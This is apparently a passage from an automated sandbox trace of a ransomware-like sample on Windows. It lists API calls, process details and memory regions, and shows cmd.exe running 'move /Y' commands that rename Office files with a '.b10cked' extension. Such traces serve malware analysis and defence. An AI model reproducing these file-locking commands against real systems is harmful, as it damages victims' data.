(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.154] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf71c | out: lpFindFileData=0x1cf71c) returned 0x2609f0 [0172.154] FindClose (in: hFindFile=0x2609f0 | out: hFindFile=0x2609f0) returned 1 [0172.154] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf71c | out: lpFindFileData=0x1cf71c) returned 0x2609f0 [0172.155] FindClose (in: hFindFile=0x2609f0 | out: hFindFile=0x2609f0) returned 1 [0172.155] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf71c | out: lpFindFileData=0x1cf71c) returned 0x2609f0 [0172.155] FindClose (in: hFindFile=0x2609f0 | out: hFindFile=0x2609f0) returned 1 [0172.155] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.155] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.155] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.155] GetEnvironmentStringsW () returned 0x260210* [0172.155] FreeEnvironmentStringsW (penv=0x260210) returned 1 [0172.155] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.156] GetConsoleOutputCP () returned 0x1b5 [0172.156] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.156] GetUserDefaultLCID () returned 0x409 [0172.156] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfae0, cchData=128 | out: lpLCData="0") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfae0, cchData=128 | out: lpLCData="0") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfae0, cchData=128 | out: lpLCData="1") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.157] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.157] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.158] GetConsoleTitleW (in: lpConsoleTitle=0x250930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.158] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.158] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.158] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.158] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.159] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.159] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.159] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.159] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.159] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.159] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.159] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0172.167] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.420] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.420] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.420] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.420] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.420] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.420] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.420] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.420] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.420] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.420] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.420] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.420] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.420] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.420] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.420] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.420] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.420] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.420] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.420] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.420] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.420] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.420] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.420] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.420] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.420] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.420] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.420] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.420] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.420] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.420] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.420] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.420] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.421] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.421] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.421] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.422] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf594, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf58c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf58c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.422] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.423] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.424] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0172.424] _wcsicmp (_String1="PPINTL~1.TRX", _String2=".") returned 66 [0172.424] _wcsicmp (_String1="PPINTL~1.TRX", _String2="..") returned 66 [0172.424] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl~1.trx")) returned 0x2020 [0172.436] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x261f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.436] SetErrorMode (uMode=0x0) returned 0x0 [0172.436] SetErrorMode (uMode=0x1) returned 0x0 [0172.436] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1cef1c, lpFilePart=0x1cef04 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", lpFilePart=0x1cef04*="PPINTL~1.TRX") returned 0x3c [0172.436] SetErrorMode (uMode=0x0) returned 0x1 [0172.436] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.436] _wcsicmp (_String1="PPINTL~1.TRX", _String2=".") returned 66 [0172.436] _wcsicmp (_String1="PPINTL~1.TRX", _String2="..") returned 66 [0172.437] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl~1.trx")) returned 0x2020 [0172.437] SetErrorMode (uMode=0x0) returned 0x0 [0172.437] SetErrorMode (uMode=0x1) returned 0x0 [0172.437] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1cf398, lpFilePart=0x1cf130 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", lpFilePart=0x1cf130*="PPINTL~1.TRX") returned 0x3c [0172.437] SetErrorMode (uMode=0x0) returned 0x1 [0172.437] SetErrorMode (uMode=0x0) returned 0x0 [0172.437] SetErrorMode (uMode=0x1) returned 0x0 [0172.437] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cf5a0, lpFilePart=0x1cf130 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked", lpFilePart=0x1cf130*="PPINTL.DLL.trx_dll.b10cked") returned 0x4a [0172.437] SetErrorMode (uMode=0x0) returned 0x1 [0172.437] SetLastError (dwErrCode=0x0) [0172.437] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.dll.trx_dll.b10cked")) returned 0xffffffff [0172.437] GetLastError () returned 0x2 [0172.437] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1ceaac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceaac) returned 0x262128 [0172.438] FindNextFileW (in: hFindFile=0x262128, lpFindFileData=0x1ceaac | out: lpFindFileData=0x1ceaac) returned 0 [0172.438] GetLastError () returned 0x12 [0172.438] FindClose (in: hFindFile=0x262128 | out: hFindFile=0x262128) returned 1 [0172.440] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x261cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x261cb8) returned 0x262128 [0172.440] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1ced44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0172.440] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1ced44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0172.440] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.dll.trx_dll")) returned 0x2020 [0172.440] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.441] FindClose (in: hFindFile=0x262128 | out: hFindFile=0x262128) returned 1 [0172.441] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1cecf8 | out: _Buffer=" 1") returned 9 [0172.441] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.441] GetFileType (hFile=0x7) returned 0x2 [0172.441] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.441] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cec84 | out: lpMode=0x1cec84) returned 1 [0172.441] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.441] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cecb8 | out: lpConsoleScreenBufferInfo=0x1cecb8) returned 1 [0172.441] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.442] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1cecf8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0172.442] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1cecdc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cecdc*=0x1a) returned 1 [0172.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.442] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.442] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.443] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.443] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.443] SetConsoleInputExeNameW () returned 0x1 [0172.443] GetConsoleOutputCP () returned 0x1b5 [0172.443] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.443] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.443] exit (_Code=0) Process: id = "297" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a60" os_pid = "0x9cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23359 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23360 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 23361 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 23362 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 23363 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23364 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23365 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23366 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23367 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23368 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23525 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23526 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23527 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23528 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 23529 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 23530 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23531 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23532 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23533 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23534 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23535 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23536 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23537 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23538 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23539 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 23540 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23541 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23542 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 23543 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 23544 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 23545 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 23546 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 23547 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 23548 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 365 os_tid = 0x9c0 [0172.397] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fad4 | out: lpSystemTimeAsFileTime=0x12fad4*(dwLowDateTime=0x9ca79ca0, dwHighDateTime=0x1d440a9)) [0172.397] GetCurrentProcessId () returned 0x9cc [0172.397] GetCurrentThreadId () returned 0x9c0 [0172.398] GetTickCount () returned 0x323e4 [0172.398] QueryPerformanceCounter (in: lpPerformanceCount=0x12facc | out: lpPerformanceCount=0x12facc*=22918676555) returned 1 [0172.398] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.398] __set_app_type (_Type=0x1) [0172.398] __p__fmode () returned 0x76b331f4 [0172.398] __p__commode () returned 0x76b331fc [0172.399] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.399] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.399] GetCurrentThreadId () returned 0x9c0 [0172.399] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c0) returned 0x38 [0172.399] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.399] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.399] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.399] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.399] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa64 | out: phkResult=0x12fa64*=0x0) returned 0x2 [0172.399] VirtualQuery (in: lpAddress=0x12fa9b, lpBuffer=0x12fa34, dwLength=0x1c | out: lpBuffer=0x12fa34*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.399] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa34, 